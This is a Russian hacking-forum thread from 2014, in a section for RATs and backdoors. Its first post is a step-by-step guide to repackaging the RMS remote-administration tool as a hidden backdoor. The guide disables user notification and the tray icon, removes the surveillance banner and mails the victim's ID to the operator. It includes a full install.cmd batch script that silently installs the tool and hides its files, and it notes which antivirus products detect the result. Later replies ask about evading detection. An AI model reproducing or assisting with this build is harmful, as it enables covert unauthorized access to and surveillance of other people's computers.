1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Скрытый RMS 5.5

Тема в разделе "RATs|:|Backdoors", создана пользователем cRoss1k, 21 янв 2014.

  1. cRoss1k
    cRoss1k Новичок
    Симпатии:
    0
    Скачиваем последнюю версию RMS 5.5 с официального сайта, запускаем вьювер выбираем меню Инструменты, MSI конфигуратор, открываем файл RMS хоста. Выбираем дистрибутив "One Click" отмечаем генерировать новый id при отправке на почту, вводим свое мыло, ставим отключить создание ярлыков, не запрашивать подтверждения и т.д. Нажимаем Конфигурировать, отключаем: оповещение пользователя, иконку в трее, вобщем все по старой схеме.Полученный RMS.exe открываем в WinHex и нажимаем ctrl+F, вводим туда эту строчку: RunProgram="forcenowait:http://rmansys.ru/" и нажимаем поиск, найденную строчку забиваем пробелами, внимательно чтобы не удалить лишние символы.После этого сохраняем RMS.exe. Этими действиями мы убрали открытие сайта rmansys.ru при запуске RMS.exeДалее открываем RMS.exe 7-zip ом и добавляем туда файлы: winmm.dll и 28.reg. После этого извлекаем файл install.cmd, открываем его блокнотом и удаляем все, вместо этого копируем туда этот код
    Код:
    :mad:chcp 1251mkdir "%ProgramFiles%\Remote Manipulator System - Host"copy winmm.dll "%ProgramFiles%\Remote Manipulator System - Host" >nul@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress@ping 127.0.0.1@MsiExec /I "rms.host5.5ru.msi" /qn@ping 127.0.0.1regedit /s 28.reg@attrib +h +s +r "%programfiles%\Remote Manipulator System - Host"@attrib +h +s +r "%ProgramFiles(x86)%\Remote Manipulator System - Host"@attrib +h +s +r /d /s "%programfiles%\Remote Manipulator System - Host\*.*"@attrib +h +s +r /d /s "%ProgramFiles(x86)%\Remote Manipulator System - Host\*.*"
    
    Сохраняем новый install.cmd и упаковываем обратно. Все RMS.exe готов-полностью скрытый-убран баннер о видеонаблюдении-отправка id на почту-не убиваем в процессах-из главных 5-и АВ пока палица только Авирой, она палит winmm.dll (ну и проактивками)ЗАПУСКАЕМ НА ВИРТУАЛКЕСборку сделал grs101:)
    Hidden Content:
    **Hidden Content: To see this hidden content your post count must be 2 or greater.**
     
    Последнее редактирование модератором: 7 янв 2017
    21 янв 2014
  2. KetLin
    KetLin Новичок
    Симпатии:
    0
    Простите за глупый вопрос: а где брать файлы winmm.dll и 28.reg и где чистить реестр после неоднократных установок.
     
    22 янв 2014
  3. nebra
    nebra Новичок
    Симпатии:
    13
    cRoss1k не стоит рекламировать свой сайт, я бы тебе поставил -10
     
    22 янв 2014
  4. KetLin
    KetLin Новичок
    Симпатии:
    0
    Согласен на 100%. Еще бы чуток информации для тех кто в начале пути. Тогда и 200 мало будет.:-[

    Добавлено через 3 минуты
    Без winmm.dll и 28.reg все работает при открытой установке (невзирая на ругань каспера), но какие может это повлечь глюки?
     
    Последнее редактирование: 22 янв 2014
    22 янв 2014
  5. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Да не пиар это, а кривой копипаст откуда-то вместе с паролем.
    Было бы хоть что пиарить, кстати...
     
    23 янв 2014
  6. An0nym
    An0nym Новичок
    Симпатии:
    0
    чушь полная..... нашел 5 одинаковых статей. Копипастеры ЕБ*****
     
    23 янв 2014
  7. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    На нашем форуме эта разработка была описана одной из первых
     
    23 янв 2014
  8. An0nym
    An0nym Новичок
    Симпатии:
    0
    Уважаемый Админ могу тогда выложить новую инфу по новой версии RMS 5.6



    её я ещё ни где не находил :-[
     
    23 янв 2014
  9. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    Конечно выкладывайте, у нас есть специальный раздел для этого: http://www.xaker.name/forvb/forumdisplay.php?f=174
     
    23 янв 2014
  10. S_I_D
    S_I_D Guest
    Табличка с запросом на отправку email выходит
    чую под хайдом что-то интересное :(
    но "репутация" что-то подводит
     
    11 май 2014
  11. chicago
    chicago Новичок
    Симпатии:
    0
    нормально работает?кто пробовал?
     
    20 май 2014
  12. CaroleNetwork
    CaroleNetwork Новичок
    Симпатии:
    0
    Палится антивирусами? кейлогер встроен этому прогу?
     
    11 июл 2014
  13. karencho
    karencho Новичок
    Симпатии:
    2
    привет всем антивирусами уже палится ,можно узнать файл winmm.dll можно удалить после послания ид на меил? тогда ведь антивирусами палится не будет да? мне это нужно для WPI спасибо заранее
     
    11 сен 2014
  14. melovod
    melovod Новичок
    Симпатии:
    5
    Он должен быть в системе,ибо будет вылетать банер
     
    12 сен 2014
  15. karencho
    karencho Новичок
    Симпатии:
    2
    даже в новой версии?
     
    12 сен 2014
  16. karencho
    karencho Новичок
    Симпатии:
    2
    привет всем люди создал обычный инсталятор через рмс вивер, в скрытом режиме ,но никаких баннеров не выбивал мне кто подскажет в версии 5.6 эту функцию убрали? и можете сказать после установки такой версии антивирусы его будут палить как вирус?
     
    5 окт 2014
  17. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    65
    Ничего не убрали. Скорее всего в Цэ\Програм филес завалялась winmm.dll
    При деинсталляции рмс она не удаляется.
     
    5 окт 2014
  18. karencho
    karencho Новичок
    Симпатии:
    2
    просмотрел нету файла,но я никаких дополнений не делал,а просто создал инсталяшку и все и да было предупреждение о инсталяции рмс но баннер не появляется
     
    5 окт 2014
  19. dulex
    dulex Новичок
    Симпатии:
    0
    это средство удаленного администрирования?
     
    19 апр 2015
  20. onthar
    onthar Команда форума Админ
    Симпатии:
    388
    да
     
    19 апр 2015

Поделиться этой страницей

Загрузка...